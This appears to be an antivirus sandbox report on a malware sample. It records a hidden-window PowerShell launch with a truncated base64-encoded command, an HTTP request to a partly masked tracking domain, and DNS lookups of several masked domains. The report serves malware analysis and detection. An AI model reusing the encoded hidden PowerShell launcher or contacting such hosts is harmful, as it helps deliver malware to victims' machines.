Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAHcAeQBzAHEAagBpAGkAagA9ACcARgBwAG4AaQBjAGsAZQBiAHEAcQBhAGwAbgAnADsAJABIAGcAdABmAGgAagB3AHIAbQB5AC...
Network activity
TCP
HTTP GET requests
- http://cp####soffers.com/track.cpleadsoffers.com/71yxxan/
UDP
- DNS ASK cp####soffers.com
- DNS ASK ke####safety.com
- DNS ASK ab#######tradingmarketing.com
- DNS ASK kn####planning.com
- DNS ASK ex###iortec.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAHcAeQBzAHEAagBpAGkAagA9ACcARgBwAG4AaQBjAGsAZQBiAHEAcQBhAGwAbgAnADsAJABIAGcAdABmAGgAagB3AHIAbQB5AC...' (with hidden window)
